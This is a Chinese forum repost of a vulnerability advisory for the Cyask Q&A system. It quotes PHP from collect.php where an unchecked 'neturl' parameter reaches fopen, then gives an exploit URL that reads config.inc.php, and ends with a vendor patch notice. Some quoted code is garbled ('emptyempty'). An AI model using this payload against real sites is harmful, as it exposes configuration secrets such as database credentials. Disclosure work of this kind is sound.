• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    cyask知道系统collect.php页面存在越权漏洞

    发布者: 火山休眠期 | 发布时间: 2025-6-28 23:12| 查看数: 110| 评论数: 0|帖子模式

    影响版本:
    Cyask
    程序介绍:
    Cyask国内较为多人使用的仿百度风格的Ask系统。
    漏洞分析:

    从Collect.php代码当中可以看到

    else   
    {     
    /*   
    检查网址   
    */   
    $url=get_referer();     
    $neturl=emptyempty($_POST['neturl']) ? trim($_GET['neturl']) : trim($_POST['neturl']);     
       
    $collect_url=emptyempty($neturl) ? $url : $neturl;     
       
    $contents = ”;     
    if($fid=@fopen($collect_url,”r“))     
    {     
    do   
    {     
    $data = fread($fid, 4096);     
    if (strlen($data) == 0)     
    {     
    break;     
    }     
    $contents .= $data;     
    }     
    while(true);     
    fclose($fid);     
    }     
    else   
    {     
    show_message(’collect_url_error’, ”);     
    exit;     
    }   

    漏洞利用:
    http://www.target.com/collect.php?neturl=config.inc.php
    解决方案:
    厂商补丁:
    cyask
    -------
    目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载

    来源:https://www.jb51.net/hack/16354.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    浏览过的版块

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表